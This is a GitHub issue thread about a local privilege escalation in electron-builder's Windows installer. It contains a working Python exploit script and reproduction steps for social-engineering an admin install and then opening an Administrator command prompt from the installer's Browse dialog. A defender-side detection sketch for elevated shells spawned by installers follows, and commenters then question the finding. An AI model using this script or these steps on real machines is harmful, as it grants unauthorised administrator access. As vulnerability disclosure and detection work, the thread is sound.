electron-userland / electron-builder

A complete solution to package and build a ready for distribution Electron app with “auto update” support out of the box
https://www.electron.build
MIT License

Installer is capable of spawning elevated command prompt which leads to LPE to `Administrator` #8492

Open ViktarStarastsenka opened 1 month ago

ViktarStarastsenka commented 1 month ago

Summary

An Electron application runs as Administrator during installation, allowing the current user to escalate privileges to Administrator by clicking on Browse, right clicking Desktop while holding SHIFT, and choosing Open command window here.

Remediation:

Do not allow users to break out of the installer window and run programs in the same elevated context during installation.

If an application needs to be run during installation, impersonate the user token with a Medium or lower integrity and do not run with elevated privileges.

mmaietta commented 1 month ago

Can you share a video of what you're mentioning? I'm not sure I'm following

> impersonate the user token with a Medium or lower integrity and do not run with elevated privileges.

I also am not sure I understand what you mean by user token either.

It's proper update logic for the application to attempt to be installed as current user, before attempting to use elevate.exe (with UAC prompt) to elevate the installer to admin rights for installation

ViktarStarastsenka commented 1 month ago

@mmaietta ,

Steps To Reproduce (Local Privilege Escalation to Administrator)

Non-Admin User - The Attacker:

1) Run the following exploit (Python3 script) in the background. Make sure the pyautogui, pywin32, and psutil modules are installed using pip install before running the exploit.

```python
import pyautogui
import win32gui
import os
import psutil

input("This exploit will run when you press ENTER (this window will be hidden).\nRequest an admin to download and install the application after starting the exploit..")
hwnd = win32gui.GetForegroundWindow()
win32gui.ShowWindow(hwnd, 0)

def check_for_consent():
    for proc in psutil.process_iter(['name']):
        if proc.info['name'] == 'consent.exe':
            return True
    return False

isRunning = False
while not isRunning:
    windows = pyautogui.getAllTitles()
    if "Application Setup " in windows:
        print("Application Setup Window Detected..")
        isRunning = True

os.system("echo blocker > %LOCALAPPDATA%\Programs\App_name")

isUACSpawned = False
while not isUACSpawned:
    isUACSpawned = check_for_consent()
print("UAC Opened..")
while isUACSpawned:
    isUACSpawned = check_for_consent()
print("UAC Completed..")

print("Locking..")
cmd='rundll32.exe user32.dll, LockWorkStation'
os.system(cmd)
```

2) Request an admin user to help install the application for Windows for the non-admin user. In a real world scenario, this can be submitted through a support ticket to IT.

Admin User - The Victim:

3) Attempt to install the application for the current user, but observe that the Install button is greyed out (this is due to the exploit). Therefore, choose to install for all users instead (requires admin credentials).

5) Observe that the user's workstation is now locked due to the attacker's running exploit. At this point, return the machine back to the non-admin user.

Non-Admin User - The Attacker:

6) Unlock the account to re-access the machine.

7) Click on Browse, right click Desktop while holding SHIFT, and choose Open command window here. An Administrator command prompt has now been granted to the attacker. {F3540322}

8) This confirms the local privilege escalation to Administrator scenario.
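
As an added example from the defender's side (not code from this issue or from electron-builder), here is a small process-creation check that flags a High- or System-integrity cmd.exe or PowerShell whose parent is an installer process, which is the process relationship the Browse / "Open command window here" path above would produce. It assumes Sysmon-style fields (Image, ParentImage, IntegrityLevel) and a file-name heuristic for installers; the sample events are constructed.

```python
"""Detection sketch: an elevated shell whose parent is an installer.

Added example, not from the original issue or electron-builder. Assumes
Sysmon-style process-creation fields; sample events are constructed.
"""
from pathlib import PureWindowsPath

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
ELEVATED = {"High", "System"}
# Name heuristic (assumption): a production rule would list the product's
# real installer file name instead of these substrings.
INSTALLER_HINTS = ("setup", "install")

def _basename(image: str) -> str:
    return PureWindowsPath(image).name.lower()

def looks_like_installer(image: str) -> bool:
    return any(hint in _basename(image) for hint in INSTALLER_HINTS)

def is_suspicious(event: dict) -> bool:
    """True for a High/System-integrity shell spawned by an installer.
    An admin's own prompt (parent explorer.exe or cmd.exe) does not
    match, so routine admin work stays quiet.
    """
    return (
        _basename(event["Image"]) in SHELLS
        and event.get("IntegrityLevel") in ELEVATED
        and looks_like_installer(event["ParentImage"])
    )

def find_suspicious(events):
    """ProcessIds of matching events, in input order."""
    return [e["ProcessId"] for e in events if is_suspicious(e)]

# Constructed sample events (not real telemetry); only 4242 should match.
SAMPLE_EVENTS = [
    {"ProcessId": 4100, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "IntegrityLevel": "Medium"},
    {"ProcessId": 4242, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Users\alice\Downloads\App-Setup-1.2.3.exe",
     "IntegrityLevel": "High"},
    {"ProcessId": 4300, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe", "IntegrityLevel": "High"},
    {"ProcessId": 4311, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Users\alice\Downloads\App-Setup-1.2.3.exe",
     "IntegrityLevel": "High"},
]
```

`find_suspicious(SAMPLE_EVENTS)` returns `[4242]`: the elevated shell under the installer is flagged, while the user's Medium-integrity prompt and the admin's PowerShell under cmd.exe are not.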

mmaietta commented 1 month ago

Is this possible with any other app that isn't electron-based and also not built with electron-builder? Looks like this script could be used for any app installation since this is being executed os.system("echo blocker > %LOCALAPPDATA%\Programs\App_name")

This seems like a vulnerability in NSIS installers as the electron app doesn't have any context as to what is occurring during installation. It executes an elevate.exe for admin-installs and does not execute a consent.exe - not sure where consent.exe is coming from albeit my knowledge of Windows OS & NSIS scripting is pretty minimal.

ivanggq commented 1 month ago

Just a curious bystander, that got interested in this issue. I have a few questions:

  1. > observe that the Install button is greyed out (this is due to the exploit)

     • How is the Python script disabling the Install button? By os.system("echo blocker > %LOCALAPPDATA%\Programs\App_name")? This is writing a file %LOCALAPPDATA%\Programs\App_name with content blocker, right? Is this disabling the Install button? If so, how exactly?
  2. The exploit is essentially locking the session while the admin has an elevated app running. This seems no different than an admin coming to the PC, opening an elevated CMD and locking the session, leaving the admin CMD behind. Of course the elevated CMD can be used if it is not closed... or am I missing something.
  3. But even if an admin makes this mistake (leaves an elevated app/CMD), how is he exactly a victim? The non-admin user just gained elevated access to his machine and nothing else. Maybe causing a headache for the IT admin (breaking something and the IT admin may need to fix it later), but how is the admin the victim?

redisec commented 1 month ago

@ivanggq, I agree with points 2 and 3 in your comments. There are probably other and easier ways to trick an admin into leaving an elevated cmd open.
I think the main problem is that there is a way to alter the execution flow of the electron-based application by using this script. I am also not an expert in Windows app flows. Would be great if someone could confirm if this is a Windows issue applicable to other types of installers or the electron specific one (like @mmaietta mentioned earlier). Any windows experts here?